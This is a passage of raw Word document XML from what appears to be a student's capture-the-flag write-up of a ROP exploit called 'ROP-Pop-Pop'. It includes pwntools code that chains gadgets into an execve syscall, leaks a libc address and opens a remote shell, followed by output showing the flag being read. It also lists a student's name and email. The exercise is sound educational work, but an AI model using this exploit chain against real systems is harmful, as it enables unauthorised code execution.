          <w:p w14:paraId="30B7E38C" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datRDX = p64(0x00)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="19A14A94" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>datRAX = p64(0x3b)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="591C7E3E" w14:textId="2E5D093B" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3523F11B" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3EE577D1" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>pld = cyclic(40)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0432730F" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>pld += retGdgt + popRDI + datRDI + popRSI + datRSI + junk + popRDX + datRDX + junk + popRAX + datRAX + syscall + retGdgt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="643706A7" w14:textId="1E74A9AB" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>return pld</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="61932E13" w14:textId="5AF32318" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Payload Builder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324A907D" w14:textId="1CD67310" w:rsidR="00B024C7" w:rsidRDefault="008F4C00" w:rsidP="00B024C7">
      <w:r>
        <w:t>The following function sends the first payload to retrieve the gets address and return to main. Then it calculates the libC base address with the offset of gets in this libC version and uses that to send a second payload that will open a shell.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="008F4C00" w14:paraId="3F13A835" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="4DE0F059" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>def pwnRemote(p):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49715335" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B920008" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.sendline(mainLinePld())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B17FC56" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="72384961" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>print(p.recvline())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7463FBC8" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>addr = p.recvline()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3ABF1713" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info(addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FE511A3" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>leak = u64(addr.ljust(8, b'\x00'))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="21E27CF9" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("gots leak - " + hex(leak))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08E11F5F" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F7D3ADB" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>#libcBase = leak - 0xf7a50 + 0x100000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4247B801" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>libcBase = leak - 0x00083970</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="546ACD09" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>log.info("libcBase - " + hex(libcBase))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2048C7D6" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23270FFF" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C9D6668" w14:textId="77777777" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.sendline(pwnPLD_libc2(libcBase))</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26023E10" w14:textId="2D6E632C" w:rsidR="008F4C00" w:rsidRDefault="008F4C00" w:rsidP="008F4C00">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:tab/>
              <w:t>p.interactive()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7028BC2A" w14:textId="0081A02A" w:rsidR="008F4C00" w:rsidRDefault="00B24F36" w:rsidP="008F4C00">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>pwnRemote</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702F1517" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D848594" w14:textId="055D87CA" w:rsidR="00B024C7" w:rsidRDefault="00B24F36" w:rsidP="00B024C7">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>This script will allow me to open a shell on the remote system and get the contents of the flag.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B24F36" w14:paraId="50BD8AF3" w14:textId="77777777" w:rsidTr="008A799C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w14:paraId="276CBF68" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>┌──(kali</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic" w:cs="Malgun Gothic" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>㉿</w:t>
            </w:r>
            <w:r>
              <w:t>kali)-[~/Desktop/6-Week/ROP-Pop-Pop]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F7CC7B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>└─$ python3 RPP_Pwn_3.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C1D3D1B" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  self._log(logging.INFO, message, args, kwargs, 'info')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="08BE21C2" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] pÙ)5Ù\x7f</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0121C727" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] gots leak - 0x7fd93529d970</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07E1D513" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] libcBase - 0x7fd93521a000</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7DB7EC54" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>/home/kali/Desktop/6-Week/ROP-Pop-Pop/RPP_Pwn_3.py:329: BytesWarning: Text is not bytes; assuming ASCII, no guarantees. See https://docs.pwntools.com/#bytes</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="13F2413A" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  p.recvuntil("tools..")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4FBCFCC0" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] popRDX - 0x7fd935333431</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="203931CF" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] popRAX - 0x7fd935250174</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D38A6CB" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] syscall - 0x7fd93523c84d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1163965C" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] Switching to interactive mode</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="348C0E61" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7C107999" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ whoami</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F15E509" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>pwn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="260046E3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ pwd</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="73AC4A47" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>/home/pwn</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33AA8180" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ ls</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2F36E125" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67681384" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>rop</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EC1AF4F" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>$ cat flag.txt</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="076F22F3" w14:textId="77777777" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>flag{sodapop_shop}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F8FF52C" w14:textId="4D9C6F10" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
            <w:pPr>
              <w:pStyle w:val="Code"/>
            </w:pPr>
            <w:r>
              <w:t>[*] Got EOF while reading in interactive</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="128870C2" w14:textId="224B8C72" w:rsidR="00B24F36" w:rsidRDefault="00B24F36" w:rsidP="00B24F36">
      <w:pPr>
        <w:pStyle w:val="Fig-Cap"/>
      </w:pPr>
      <w:r>
        <w:t>Success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BF35662" w14:textId="6DDD25E5" w:rsidR="00B024C7" w:rsidRDefault="00B24F36" w:rsidP="00066F5F">
      <w:r>
        <w:t>QED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71ACEB3B" w14:textId="01C8F67F" w:rsidR="00B24F36" w:rsidRPr="00066F5F" w:rsidRDefault="00B24F36" w:rsidP="00066F5F">
      <w:r>
        <w:t xml:space="preserve">The full code used for this is available in </w:t>
      </w:r>
      <w:hyperlink w:anchor="_Appendix_E:_RPP_Pwn.py" w:history="1">
        <w:r w:rsidR="00AF0191" w:rsidRPr="00AF0191">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Appendix E</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AF0191">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="091CA393" w14:textId="77777777" w:rsidR="00066F5F" w:rsidRDefault="00066F5F" w:rsidP="00605848"/>
    <w:p w14:paraId="1766575C" w14:textId="77777777" w:rsidR="00605848" w:rsidRPr="00F31F10" w:rsidRDefault="00605848" w:rsidP="00F31F10"/>
    <w:p w14:paraId="3E5FD733" w14:textId="77777777" w:rsidR="00F31F10" w:rsidRDefault="00F31F10" w:rsidP="006C5A4E"/>
    <w:p w14:paraId="393345EC" w14:textId="09607C7F" w:rsidR="00BF2F28" w:rsidRDefault="00BF2F28" w:rsidP="00847435">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="192D3A" w:themeColor="text2" w:themeShade="80"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="42974504" w14:textId="39B7DD40" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00767735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="9" w:name="_Backdoor"/>
      <w:bookmarkStart w:id="10" w:name="_Toc161243439"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidRPr="005264D0">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Appendix A: </w:t>
      </w:r>
      <w:r>
        <w:t>Student Information</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3145"/>
        <w:gridCol w:w="6205"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="360EAC87" w14:textId="77777777" w:rsidTr="005264D0">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1B9173A8" w14:textId="11EC6E8A" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Lindsay Von Tish</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5C730EB9" w14:textId="77777777" w:rsidTr="00D757EC">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6BFD8F3B" w14:textId="7A78F21D" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="0052786E" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t>Email</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="796CC29E" w14:textId="35B27275" w:rsidR="00C32533" w:rsidRPr="005264D0" w:rsidRDefault="00000000" w:rsidP="00C32533">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidR="00437E81" w:rsidRPr="00F6092A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>lmv9443@nyu.edu</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="00437E81">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34B4CA48" w14:textId="0998245E" w:rsidR="00A34711" w:rsidRPr="005264D0" w:rsidRDefault="00087743" w:rsidP="00767735">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="_Toc161243440"/>
      <w:r w:rsidRPr="005264D0">
        <w:t>Appendix B: Tools</w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Style1"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3145"/>
        <w:gridCol w:w="6205"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="0A80666C" w14:textId="77777777" w:rsidTr="00D757EC">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7CC08C" w14:textId="6B7167F9" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00087743" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FF37948" w14:textId="63DDC162" w:rsidR="001911E4" w:rsidRPr="005264D0" w:rsidRDefault="00087743" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005264D0">
              <w:rPr>
                <w:rFonts w:cs="Calibri"/>
              </w:rPr>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A23916" w:rsidRPr="005264D0" w14:paraId="5E2CF7DD" w14:textId="77777777" w:rsidTr="00D757EC">
        <w:trPr>
          <w:cnfStyle w:val="000000100000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="1" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7AE5F79A" w14:textId="007F2914" w:rsidR="001911E4" w:rsidRPr="002E0856" w:rsidRDefault="002E0856" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t>GDB</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6205" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6358BBE4" w14:textId="0475512D" w:rsidR="001911E4" w:rsidRPr="002E0856" w:rsidRDefault="00000000" w:rsidP="00A34711">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidR="002E0856" w:rsidRPr="00F6092A">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                </w:rPr>
                <w:t>https://www.gnu.org/software/gdb/gdb.html</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidR="002E0856">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D757EC" w:rsidRPr="005264D0" w14:paraId="3C0433D4" w14:textId="77777777" w:rsidTr="00D757EC">
        <w:trPr>
          <w:cnfStyle w:val="000000010000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="1" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3145" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F5C5516" w14:textId="0AE52521" w:rsidR="00D757EC" w:rsidRDefault="00D757EC" w:rsidP="00A34711">
